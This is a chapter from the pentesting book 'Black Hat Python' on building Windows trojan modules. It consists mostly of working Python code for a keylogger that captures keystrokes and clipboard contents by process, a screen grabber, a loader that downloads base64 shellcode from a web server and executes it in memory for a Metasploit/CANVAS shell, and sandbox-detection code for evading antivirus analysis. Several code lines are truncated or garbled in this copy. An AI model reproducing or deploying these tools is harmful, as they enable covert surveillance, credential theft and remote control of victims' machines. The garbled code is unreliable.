Common Trojaning Tasks on Windows - Black Hat Python: Python Programming for Hackers and Pentesters (2014)

Black Hat Python: Python Programming for Hackers and Pentesters (2014)

Chapter 8. Common Trojaning Tasks on Windows

When you deploy a trojan, you want to perform a few common tasks: grab keystrokes, take screenshots, and execute shellcode to provide an interactive session to tools like CANVAS or Metasploit. This chapter focuses on these tasks. We’ll wrap things up with some sandbox detection techniques to determine if we are running within an antivirus or forensics sandbox. These modules will be easy to modify and will work within our trojan framework. In later chapters, we’ll explore man-in-the-browser-style attacks and privilege escalation techniques that you can deploy with your trojan. Each technique comes with its own challenges and probability of being caught by the end user or an antivirus solution. I recommend that you carefully model your target after you’ve implanted your trojan so that you can test the modules in your lab before trying them on a live target. Let’s get started by creating a simple keylogger.

Keylogging for Fun and Keystrokes

Keylogging is one of the oldest tricks in the book and is still employed with various levels of stealth today. Attackers still use it because it’s extremely effective at capturing sensitive information such as credentials or conversations.

An excellent Python library named PyHook[17] enables us to easily trap all keyboard events. It takes advantage of the native Windows function SetWindowsHookEx, which allows you to install a user-defined function to be called for certain Windows events. By registering a hook for keyboard events, we are able to trap all of the keypresses that a target issues. On top of this, we want to know exactly what process they are executing these keystrokes against, so that we can determine when usernames, passwords, or other tidbits of useful information are entered. PyHook takes care of all of the low-level programming for us, which leaves the core logic of the keystroke logger up to us. Let’s crack open and drop in some of the plumbing:

from ctypes import *

import pythoncom

import pyHook

import win32clipboard

user32 = windll.user32

kernel32 = windll.kernel32

psapi = windll.psapi

current_window = None

def get_current_process():

# get a handle to the foreground window

➊ hwnd = user32.GetForegroundWindow()

# find the process ID

pid = c_ulong(0)

➋ user32.GetWindowThreadProcessId(hwnd, byref(pid))

# store the current process ID

process_id = "%d" % pid.value

# grab the executable

executable = create_string_buffer("\x00" * 512)

➌ h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)

➍ psapi.GetModuleBaseNameA(h_process,None,byref(executable),512)

# now read its title

window_title = create_string_buffer("\x00" * 512)

➎ length = user32.GetWindowTextA(hwnd, byref(window_title),512)

# print out the header if we're in the right process


➏ print "[ PID: %s - %s - %s ]" % (process_id, executable.value, window_.



# close handles



All right! So we just put in some helper variables and a function that will capture the active window and its associated process ID. We first call GetForeGroundWindow ➊, which returns a handle to the active window on the target’s desktop. Next we pass that handle to theGetWindowThreadProcessId ➋ function to retrieve the window’s process ID. We then open the process ➌ and, using the resulting process handle, we find the actual executable name ➍ of the process. The final step is to grab the full text of the window’s title bar using the GetWindowTextA ➎ function. At the end of our helper function we output all of the information ➏ in a nice header so that you can clearly see which keystrokes went with which process and window. Now let’s put the meat of our keystroke logger in place to finish it off.

def KeyStroke(event):

global current_window

# check to see if target changed windows

➊ if event.WindowName != current_window:

current_window = event.WindowName


# if they pressed a standard key

➋ if event.Ascii > 32 and event.Ascii < 127:

print chr(event.Ascii),


# if [Ctrl-V], get the value on the clipboard

➌ if event.Key == "V":


pasted_value = win32clipboard.GetClipboardData()


print "[PASTE] - %s" % (pasted_value),


print "[%s]" % event.Key,

# pass execution to next hook registered

return True

# create and register a hook manager

➍ kl = pyHook.HookManager()

➎ kl.KeyDown = KeyStroke

# register the hook and execute forever

➏ kl.HookKeyboard()


That’s all you need! We define our PyHook HookManager ➍ and then bind the KeyDown event to our user-defined callback function KeyStroke ➎. We then instruct PyHook to hook all keypresses ➏ and continue execution. Whenever the target presses a key on the keyboard, our KeyStrokefunction is called with an event object as its only parameter. The first thing we do is check if the user has changed windows ➊ and if so, we acquire the new window’s name and process information. We then look at the keystroke that was issued ➋ and if it falls within the ASCII-printable range, we simply print it out. If it’s a modifier (such as the SHIFT, CTRL, or ALT keys) or any other nonstandard key, we grab the key name from the event object. We also check if the user is performing a paste operation ➌, and if so we dump the contents of the clipboard. The callback function wraps up by returning True to allow the next hook in the chain — if there is one — to process the event. Let’s take it for a spin!

Kicking the Tires

It’s easy to test our keylogger. Simply run it, and then start using Windows normally. Try using your web browser, calculator, or any other application, and view the results in your terminal. The output below is going to look a little off, which is only due to the formatting in the book.


[ PID: 3836 - cmd.exe - C:\WINDOWS\system32\cmd.exe -

c:\Python27\python.exe key ]

t e s t

[ PID: 120 - IEXPLORE.EXE - Bing - Microsoft Internet Explorer ]

w w w . n o s t a r c h . c o m [Return]

[ PID: 3836 - cmd.exe - C:\WINDOWS\system32\cmd.exe -

c:\Python27\python.exe ]

[Lwin] r

[ PID: 1944 - Explorer.EXE - Run ]

c a l c [Return]

[ PID: 2848 - calc.exe - Calculator ]

➊ [Lshift] + 1 =

You can see that I typed the word test into the main window where the keylogger script ran. I then fired up Internet Explorer, browsed to, and ran some other applications. We can now safely say that our keylogger can be added to our bag of trojaning tricks! Let’s move on to taking screenshots.

Taking Screenshots

Most pieces of malware and penetration testing frameworks include the capability to take screenshots against the remote target. This can help capture images, video frames, or other sensitive data that you might not see with a packet capture or keylogger. Thankfully, we can use the PyWin32 package (see Installing the Prerequisites) to make native calls to the Windows API to grab them.

A screenshot grabber will use the Windows Graphics Device Interface (GDI) to determine necessary properties such as the total screen size, and to grab the image. Some screenshot software will only grab a picture of the currently active window or application, but in our case we want the entire screen. Let’s get started. Crack open and drop in the following code:

import win32gui

import win32ui

import win32con

import win32api

# grab a handle to the main desktop window

➊ hdesktop = win32gui.GetDesktopWindow()

# determine the size of all monitors in pixels

➋ width = win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN)

height = win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)

left = win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN)

top = win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN)

# create a device context

➌ desktop_dc = win32gui.GetWindowDC(hdesktop)

img_dc = win32ui.CreateDCFromHandle(desktop_dc)

# create a memory based device context

➍ mem_dc = img_dc.CreateCompatibleDC()

# create a bitmap object

➎ screenshot = win32ui.CreateBitmap()

screenshot.CreateCompatibleBitmap(img_dc, width, height)


# copy the screen into our memory device context

➏ mem_dc.BitBlt((0, 0), (width, height), img_dc, (left, top), win32con.SRCCOPY)

➐ # save the bitmap to a file

screenshot.SaveBitmapFile(mem_dc, 'c:\\WINDOWS\\Temp\\screenshot.bmp')

# free our objects



Let’s review what this little script does. First we acquire a handle to the entire desktop ➊, which includes the entire viewable area across multiple monitors. We then determine the size of the screen(s) ➋ so that we know the dimensions required for the screenshot. We create a device context[18] using the GetWindowDC ➌ function call and pass in a handle to our desktop. Next we need to create a memory-based device context ➍ where we will store our image capture until we store the bitmap bytes to a file. We then create a bitmap object ➎ that is set to the device context of our desktop. The SelectObject call then sets the memory-based device context to point at the bitmap object that we’re capturing. We use the BitBlt ➏ function to take a bit-for-bit copy of the desktop image and store it in the memory-based context. Think of this as a memcpy call for GDI objects. The final step is to dump this image to disk ➐. This script is easy to test: Just run it from the command line and check the C:\WINDOWS\Temp directory for your screenshot.bmp file. Let’s move on to executing shellcode.

Pythonic Shellcode Execution

There might come a time when you want to be able to interact with one of your target machines, or use a juicy new exploit module from your favorite penetration testing or exploit framework. This typically — though not always — requires some form of shellcode execution. In order to execute raw shellcode, we simply need to create a buffer in memory, and using the ctypes module, create a function pointer to that memory and call the function. In our case, we’re going to use urllib2 to grab the shellcode from a web server in base64 format and then execute it. Let’s get started! Open up and enter the following code:

import urllib2

import ctypes

import base64

# retrieve the shellcode from our web server

url = "http://localhost:8000/shellcode.bin"

➊ response = urllib2.urlopen(url)

# decode the shellcode from base64

shellcode = base64.b64decode(

# create a buffer in memory

➋ shellcode_buffer = ctypes.create_string_buffer(shellcode, len(shellcode))

# create a function pointer to our shellcode

➌ shellcode_func = ctypes.cast(shellcode_buffer, ctypes.CFUNCTYPE


# call our shellcode

➍ shellcode_func()

How awesome is that? We kick it off by retrieving our base64-encoded shellcode from our web server ➊. We then allocate a buffer ➋ to hold the shellcode after we’ve decoded it. The ctypes cast function allows us to cast the buffer to act like a function pointer ➌ so that we can call our shell-code like we would call any normal Python function. We finish it up by calling our function pointer, which then causes the shellcode to execute ➍.

Kicking the Tires

You can handcode some shellcode or use your favorite pentesting framework like CANVAS or Metasploit[19] to generate it for you. I picked some Windows x86 callback shellcode for CANVAS in my case. Store the raw shellcode (not the string buffer!) in /tmp/shellcode.raw on your Linux machine and run the following:

justin$ base64 -i shellcode.raw > shellcode.bin

justin$ python -m SimpleHTTPServer

Serving HTTP on port 8000 ...

We simply base64-encoded the shellcode using the standard Linux command line. The next little trick uses the SimpleHTTPServer module to treat your current working directory (in our case, /tmp/) as its web root. Any requests for files will be served automatically for you. Now drop script in your Windows VM and execute it. You should see the following in your Linux terminal: - - [12/Jan/2014 21:36:30] "GET /shellcode.bin HTTP/1.1" 200 -

This indicates that your script has retrieved the shellcode from the simple web server that you set up using the SimpleHTTPServer module. If all goes well, you’ll receive a shell back to your framework, and have popped calc.exe, or displayed a message box or whatever your shellcode was compiled for.

Sandbox Detection

Increasingly, antivirus solutions employ some form of sandboxing to determine the behavior of suspicious specimens. Whether this sandbox runs on the network perimeter, which is becoming more popular, or on the target machine itself, we must do our best to avoid tipping our hand to any defense in place on the target’s network. We can use a few indicators to try to determine whether our trojan is executing within a sandbox. We’ll monitor our target machine for recent user input, including keystrokes and mouse-clicks.

Then we’ll add some basic intelligence to look for keystrokes, mouse-clicks, and double-clicks. Our script will also try to determine if the sandbox operator is sending input repeatedly (i.e., a suspicious rapid succession of continuous mouse-clicks) in order to try to respond to rudimentary sandbox detection methods. We’ll compare the last time a user interacted with the machine versus how long the machine has been running, which should give us a good idea whether we are inside a sandbox or not. A typical machine has many interactions at some point during a day since it has been booted, whereas a sandbox environment usually has no user interaction because sandboxes are typically used as an automated malware analysis technique.

We can then make a determination as to whether we would like to continue executing or not. Let’s start working on some sandbox detection code. Open and throw in the following code:

import ctypes

import random

import time

import sys

user32 = ctypes.windll.user32

kernel32 = ctypes.windll.kernel32

keystrokes = 0

mouse_clicks = 0

double_clicks = 0

These are the main variables where we are going to track the total number of mouse-clicks, double-clicks, and keystrokes. Later, we’ll look at the timing of the mouse events as well. Now let’s create and test some code for detecting how long the system has been running and how long since the last user input. Add the following function to your script:

class LASTINPUTINFO(ctypes.Structure):

_fields_ = [("cbSize", ctypes.c_uint),

("dwTime", ctypes.c_ulong)


def get_last_input():

struct_lastinputinfo = LASTINPUTINFO()

➊ struct_lastinputinfo.cbSize = ctypes.sizeof(LASTINPUTINFO)

# get last input registered

➋ user32.GetLastInputInfo(ctypes.byref(struct_lastinputinfo))

# now determine how long the machine has been running

➌ run_time = kernel32.GetTickCount()

elapsed = run_time - struct_lastinputinfo.dwTime

print "[*] It's been %d milliseconds since the last input event." %


return elapsed


➍ while True:



We define a LASTINPUTINFO structure that will hold the timestamp (in milliseconds) of when the last input event was detected on the system. Do note that you have to initialize the cbSize ➊ variable to the size of the structure before making the call. We then call the GetLastInputInfo ➋ function, which populates our struct_lastinputinfo.dwTime field with the timestamp. The next step is to determine how long the system has been running by using the GetTickCount ➌ function call. The last little snippet of code ➍ is simple test code where you can run the script and then move the mouse, or hit a key on the keyboard and see this new piece of code in action.

We’ll define thresholds for these user input values next. But first it’s worth noting that the total running system time and the last detected user input event can also be relevant to your particular method of implantation. For example, if you know that you’re only implanting using a phishing tactic, then it’s likely that a user had to click or perform some operation to get infected. This means that within the last minute or two, you would see user input. If for some reason you see that the machine has been running for 10 minutes and the last detected input was 10 minutes ago, then you are likely inside a sandbox that has not processed any user input. These judgment calls are all part of having a good trojan that works consistently.

This same technique can be useful for polling the system to see if a user is idle or not, as you may only want to start taking screenshots when they are actively using the machine, and likewise, you may only want to transmit data or perform other tasks when the user appears to be offline. You could also, for example, model a user over time to determine what days and hours they are typically online.

Let’s delete the last three lines of test code, and add some additional code to look at keystrokes and mouse-clicks. We’ll use a pure ctypes solution this time as opposed to the PyHook method. You can easily use PyHook for this purpose as well, but having a couple of different tricks in your toolbox always helps as each antivirus and sandboxing technology has its own ways of spotting these tricks. Let’s get coding:

def get_key_press():

global mouse_clicks

global keystrokes

➊ for i in range(0,0xff):

➋ if user32.GetAsyncKeyState(i) == -32767:

# 0x1 is the code for a left mouse-click

➌ if i == 0x1:

mouse_clicks += 1

return time.time()

➍ elif i > 32 and i < 127:

keystrokes += 1

return None

This simple function tells us the number of mouse-clicks, the time of the mouse-clicks, as well as how many keystrokes the target has issued. This works by iterating over the range of valid input keys ➊; for each key, we check whether the key has been pressed using the GetAsyncKeyState ➋ function call. If the key is detected as being pressed, we check if it is 0x1 ➌, which is the virtual key code for a left mouse-button click. We increment the total number of mouse-clicks and return the current timestamp so that we can perform timing calculations later on. We also check if there are ASCII keypresses on the keyboard ➍ and if so, we simply increment the total number of keystrokes detected. Now let’s combine the results of these functions into our primary sandbox detection loop. Add the following code to

def detect_sandbox():

global mouse_clicks

global keystrokes

➊ max_keystrokes = random.randint(10,25)

max_mouse_clicks = random.randint(5,25)

double_clicks = 0

max_double_clicks = 10

double_click_threshold = 0.250 # in seconds

first_double_click = None

average_mousetime = 0

max_input_threshold = 30000 # in milliseconds

previous_timestamp = None

detection_complete = False

➋ last_input = get_last_input()

# if we hit our threshold let's bail out

if last_input >= max_input_threshold:


while not detection_complete:

➌ keypress_time = get_key_press()

if keypress_time is not None and previous_timestamp is not None:

# calculate the time between double clicks

➍ elapsed = keypress_time - previous_timestamp

# the user double clicked

➎ if elapsed <= double_click_threshold:

double_clicks += 1

if first_double_click is None:

# grab the timestamp of the first double click

first_double_click = time.time()


➏ if double_clicks == max_double_clicks:

➐ if keypress_time - first_double_click <= .

(max_double_clicks * double_click_threshold):


# we are happy there's enough user input

➑ if keystrokes >= max_keystrokes and double_clicks >= max_.

double_clicks and mouse_clicks >= max_mouse_clicks:


previous_timestamp = keypress_time

elif keypress_time is not None:

previous_timestamp = keypress_time


print "We are ok!"

All right. Be mindful of the indentation in the code blocks above! We start by defining some variables ➊ to track the timing of mouse-clicks, and some thresholds with regard to how many keystrokes or mouse-clicks we’re happy with before considering ourselves running outside a sandbox. We randomize these thresholds with each run, but you can of course set thresholds of your own based on your own testing.

We then retrieve the elapsed time ➋ since some form of user input has been registered on the system, and if we feel that it’s been too long since we’ve seen input (based on how the infection took place as mentioned previously), we bail out and the trojan dies. Instead of dying here, you could also choose to do some innocuous activity such as reading random registry keys or checking files. After we pass this initial check, we move on to our primary keystroke and mouse-click detection loop.

We first check for keypresses or mouse-clicks ➌ and we know that if the function returns a value, it is the timestamp of when the mouse-click occurred. Next we calculate the time elapsed between mouse-clicks ➍ and then compare it to our threshold ➎ to determine whether it was a double-click. Along with double-click detection, we’re looking to see if the sandbox operator has been streaming click events ➏ into the sandbox to try to fake out sandbox detection techniques. For example, it would be rather odd to see 100 double-clicks in a row during typical computer usage. If the maximum number of double-clicks has been reached and they happened in rapid succession ➐, we bail out. Our final step is to see if we have made it through all of the checks and reached our maximum number of clicks, keystrokes, and double-clicks ➑; if so, we break out of our sandbox detection function.

I encourage you to tweak and play with the settings, and to add additional features such as virtual machine detection. It might be worthwhile to track typical usage in terms of mouse-clicks, double-clicks, and keystrokes across a few computers that you own (I mean possess — not ones that you hacked into!) to see where you feel the happy spot is. Depending on your target, you may want more paranoid settings or you may not be concerned with sandbox detection at all. Using the tools that you developed in this chapter can act as a base layer of features to roll out in your trojan, and due to the modularity of our trojaning framework, you can choose to deploy any one of them.

[17] Download PyHook here:

[18] To learn all about device contexts and GDI programming, visit the MSDN page here:

[19] As CANVAS is a commercial tool, take a look at this tutorial for generating Metasploit pay-loads here: